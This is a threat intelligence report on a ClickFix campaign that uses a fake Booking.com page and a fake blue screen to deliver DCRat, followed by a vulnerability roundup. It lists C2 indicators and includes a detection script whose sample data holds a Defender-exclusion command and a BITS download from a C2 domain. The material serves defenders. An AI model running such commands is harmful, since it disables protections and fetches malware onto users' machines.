Cyber Threat Intelligence | PacketWatch

Cyber Threat Intelligence Report | 1/12/2026 | PacketWatch

Written by The PacketWatch Intelligence Team | January 12, 2026


This week, we briefed our clients on a new ClickFix campaign that uses an urgent phishing email and a fake Windows Blue Screen of Death to trick the user.

KEY TAKEAWAYS

  • New ClickFix campaign uses fake Windows BSOD to trick users into running malicious code.

  • Critical and high-severity vulnerabilities in n8n, TrendMicro, Veeam, and Cisco, plus new CISA KEV additions: patch now!




BSOD…But With Extra Steps

Last week, security researchers at Securonix disclosed a new ClickFix social engineering campaign they are calling "PHALT#BLYX". In this latest evolution of ClickFix attacks, threat actors present fake Windows Blue Screen of Death (BSOD) warnings to trick users into running malicious code. The campaign was observed targeting the hospitality sector in Europe; however, this attack methodology can and will easily spread to other verticals.

The attack begins with a phishing email impersonating Booking.com, with an urgent message stating that a customer is cancelling a reservation. The email uses the typical "sense of urgency" phrasing designed to instill panic in the victim. The email link takes the victim to a fake Booking.com site, where an "error" message says that the site is taking too long to load. Once the victim clicks the "Refresh Page" button, the browser enters full-screen mode and displays a fake BSOD error message:

Fig. 1: Fake BSOD Message | Source: Securonix

If the victim follows the steps outlined on the fake BSOD, they are redirected to the legitimate Booking.com site to make them believe the issue is resolved. In the background, however, the PowerShell command the victim executed silently downloads a .NET project file, which is then compiled with MSBuild.exe. Once running, the program checks whether it has administrative privileges. If not, it spams the victim with User Account Control (UAC) prompts; if the victim clicks "Yes", the program is granted administrative privileges. Once administrative privileges are confirmed, the program adds exclusions to Microsoft Defender and eventually disables it. Finally, it uses the Background Intelligent Transfer Service (BITS) to download the final payload, DCRat, and saves it to the C:\ProgramData\ folder. DCRat is commodity malware sold on Russian hacking forums; it gives threat actors remote access to infected devices, has additional capabilities such as keylogging and a reverse shell, and can download and execute further malicious payloads.

The researchers at Securonix identified the domains asj77[.]com, asj88[.]com, and asj99[.]com, as well as the IP address 194.169.163[.]140 over port 3535, as the command-and-control infrastructure for this specific campaign.


How to Protect Your Organization

As with all phishing and social engineering attacks, user awareness training is crucial. There are many visual cues users can watch for to spot this type of attack:

  • Standard phishing email best practices. Review the sender of the email, and hover over links before clicking to see where they actually lead. In this specific campaign, the "booking.com" link takes the user to low-house[.]com.
  • Phishing emails tend to use verbiage or phrasing that instills a sense of urgency or panic in the user.
  • The BSOD screen itself: the real Microsoft Windows Blue Screen of Death simply reports the error and informs the user that the machine will reboot. No legitimate BSOD asks the user to enter any sort of command.
  • UAC prompt spam: UAC prompts in rapid succession are designed to annoy the user into finally clicking "Yes" to give the program administrative rights.

Other defender detection and prevention opportunities include:

  • Use network monitoring tools such as PacketWatch to look for suspicious outbound connections to unknown IP addresses on non-standard ports (such as port 3535), for example:
    • http.host:(asj77.com OR asj88.com OR asj99.com) AND destination.port:3535
    • destination.ip:(194.169.163.140)
  • Enable PowerShell Script Block Logging (Event ID 4104) to capture and analyze executed PowerShell commands.
  • Disable the 'Win + R' Run command via GPO.
  • Ensure a fully up-to-date EDR solution is deployed to every endpoint.
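To show how the network indicators and the behavioural chain described above (PowerShell, MSBuild compile, Defender exclusions, BITS download into C:\ProgramData) can be turned into detection logic, here is an added example written for this report; it is not PacketWatch's or Securonix's tooling. It runs the report's domains, IP, and port against a constructed flow log, and scores constructed PowerShell Script Block (Event ID 4104) texts against the stages of the chain. The flow-record layout, the sample lines, and the exact commands matched (the Add-MpPreference, Set-MpPreference, and Start-BitsTransfer cmdlets are standard Windows ones) are assumptions, not details from the Securonix write-up.

```python
"""Added example (not PacketWatch's or Securonix's tooling): match the PHALT#BLYX
indicators and behaviours from this report against two constructed log feeds."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Network indicators taken from the report (defanged brackets removed).
C2_DOMAINS = {"asj77.com", "asj88.com", "asj99.com"}
C2_IPS = {"194.169.163.140"}
C2_PORT = 3535
PHISHING_DOMAINS = {"low-house.com"}

# Stages of the post-click chain the report describes: PowerShell -> MSBuild
# compile -> Defender exclusions/disable -> BITS download into C:\ProgramData.
# Cmdlet names are the standard Windows ones; the exact command shapes are assumptions.
SCRIPT_PATTERNS = {
    "msbuild_compile": re.compile(r"\bmsbuild(\.exe)?\b", re.I),
    "defender_exclusion": re.compile(r"Add-MpPreference\s+-Exclusion\w*", re.I),
    "defender_disable": re.compile(r"Set-MpPreference\s+-Disable\w*", re.I),
    "bits_download": re.compile(r"Start-BitsTransfer|\bbitsadmin\b", re.I),
    "programdata_drop": re.compile(r"C:\\ProgramData\b", re.I),
    "c2_indicator": re.compile("|".join(re.escape(i) for i in sorted(C2_DOMAINS | C2_IPS)), re.I),
}


@dataclass
class Alert:
    source: str         # "flow" or "ps4104"
    severity: str       # "high" or "low"
    reasons: List[str]
    line: str


def check_flow(line: str) -> Optional[Alert]:
    """Constructed flow format: '<src_ip> <dst_ip> <dst_port> [<http_host>]'.
    An indicator hit is high; a bare port-3535 connection is a low-severity review item."""
    parts = line.split()
    if len(parts) < 3:
        return None
    dst, port = parts[1], int(parts[2])
    host = parts[3].lower() if len(parts) > 3 else ""
    reasons = []
    if dst in C2_IPS:
        reasons.append(f"destination {dst} is a known C2 address")
    if host in C2_DOMAINS:
        reasons.append(f"HTTP host {host} is a known C2 domain")
    if host in PHISHING_DOMAINS:
        reasons.append(f"HTTP host {host} is the phishing landing domain")
    ioc_hit = bool(reasons)
    if port == C2_PORT:
        reasons.append(f"non-standard destination port {port}")
    if not reasons:
        return None
    return Alert("flow", "high" if ioc_hit else "low", reasons, line)


def check_script_block(text: str) -> Optional[Alert]:
    """Score one Event ID 4104 ScriptBlockText. Defender tampering or a C2 indicator
    is high on its own; otherwise two distinct chain stages are needed for high."""
    hits = [name for name, rx in SCRIPT_PATTERNS.items() if rx.search(text)]
    if not hits:
        return None
    strong = {"defender_exclusion", "defender_disable", "c2_indicator"} & set(hits)
    severity = "high" if strong or len(hits) >= 2 else "low"
    return Alert("ps4104", severity, hits, text)


def scan(flow_lines, script_blocks) -> List[Alert]:
    """Run both checks and return every alert raised."""
    alerts = [a for a in map(check_flow, flow_lines) if a]
    alerts += [a for a in map(check_script_block, script_blocks) if a]
    return alerts


# Constructed sample data (RFC 5737 documentation addresses for the benign/unknown hosts).
SAMPLE_FLOWS = [
    "10.0.0.15 203.0.113.5 443 example.com",
    "10.0.0.15 203.0.113.10 443 low-house.com",
    "10.0.0.15 194.169.163.140 3535 asj77.com",
    "10.0.0.22 198.51.100.7 3535",
]
SAMPLE_SCRIPT_BLOCKS = [
    r"Get-ChildItem C:\Users\alice\Documents",
    r"Add-MpPreference -ExclusionPath C:\ProgramData",
    r"MSBuild.exe $env:TEMP\p.xml",
    r"Start-BitsTransfer -Source http://asj77.com/x -Destination C:\ProgramData\svc.exe",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_FLOWS, SAMPLE_SCRIPT_BLOCKS):
        print(f"[{alert.severity.upper()}] {alert.source}: {alert.line}")
        for reason in alert.reasons:
            print(f"    - {reason}")
```

The severity split is deliberate: a connection on port 3535 to an address that is not on the indicator list is only a review item, because the port alone will match legitimate traffic, while any hit on the report's domains or IP, or any Defender tampering in a script block, is treated as high regardless of what else matched. The indicator sets are plain Python sets so they can be replaced with the current list from the team's threat feed.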


Resources:

Vulnerability Roundup


Maximum-Severity Vulnerability in n8n (Ni8mare)

Several critical vulnerabilities were recently disclosed in n8n, a widely used open-source automation and workflow platform. The most severe, known as "Ni8mare", is a maximum-severity vulnerability that allows an unauthenticated remote attacker to gain access to sensitive files and data. Because an automation platform such as n8n stores the credentials its workflows use, this can give threat actors access to API keys, OAuth tokens, database credentials, and more. The vulnerability is tracked as CVE-2026-21858 and affects n8n deployments from version 1.65.0 up to version 1.121.0, which contains the fix. Administrators are urged to patch to version 1.121.0 or higher. Additionally, it is recommended not to expose n8n to the internet unless absolutely necessary.


Critical Vulnerability in TrendMicro Apex Central

TrendMicro released a fix for a critical remote code execution vulnerability in Apex Central, its web-based management console that lets administrators manage multiple TrendMicro products and services. The vulnerability, tracked as CVE-2025-69258, allows a remote unauthenticated attacker to load a malicious DLL into a "key executable", leading to code execution with SYSTEM privileges. The flaw affects Apex Central On-Premise instances running on Windows, versions below Build 7190. Administrators are urged to apply the patch as soon as possible, as proof-of-concept exploit code is in the wild.


Veeam Backup & Replication RCE Vulnerability

Veeam recently fixed a remote code execution vulnerability in Veeam Backup & Replication. The vulnerability, tracked as CVE-2025-59740, affects Veeam Backup & Replication versions 13.0.1.180 and all earlier version 13 builds. Successful exploitation requires the threat actor to have administrative Backup or Tape Operator roles. Three other less-severe vulnerabilities are also addressed by this patch. As Veeam Backup & Replication servers are frequently a target of ransomware operators, administrators are urged to patch to version 13.0.1.1071 or higher as soon as possible.


Vulnerability in Cisco ISE Has Public Exploit

Cisco recently fixed a vulnerability in Identity Services Engine (ISE) and ISE Passive Identity Connector (ISE-PIC). The vulnerability, tracked as CVE-2026-20029, affects these products regardless of device configuration. Successful exploitation allows remote attackers with high privileges (valid administrative credentials) to access sensitive information on the device. Cisco warns that proof-of-concept exploit code for this vulnerability is in the wild. Affected Cisco ISE and ISE-PIC releases and their fixed versions are as follows:

  • Earlier than 3.2 -> Migrate to fixed release
  • 3.2 -> 3.2 Patch 8
  • 3.3 -> 3.3 Patch 8
  • 3.4 -> 3.4 Patch 4
  • 3.5 -> Not vulnerable

Administrators are urged to apply patches as soon as possible.


CISA KEV Additions

The following vulnerabilities were added to CISA's Known Exploited Vulnerabilities Catalog in the last two weeks:

  • CVE-2025-37164 - Hewlett Packard Enterprise (HPE) OneView Code Injection Vulnerability
  • CVE-2009-0556 - Microsoft Office PowerPoint Code Injection Vulnerability
  • CVE-2025-14847 - MongoDB and MongoDB Server Improper Handling of Length Parameter Inconsistency Vulnerability


This report is provided FREE to the cybersecurity community.

Visit our Cyber Threat Intelligence Blog for additional reports.


NOTE
We have enhanced our report with data from SOCRadar. You may need to register to view their threat intelligence content.

DISCLAIMER
Kindly be advised that the information contained in this article is presented with no final evaluation and should be considered raw data. The sole purpose of this information is to provide situational awareness based on the currently available knowledge. We recommend exercising caution and conducting further research as necessary before making any decisions based on this information.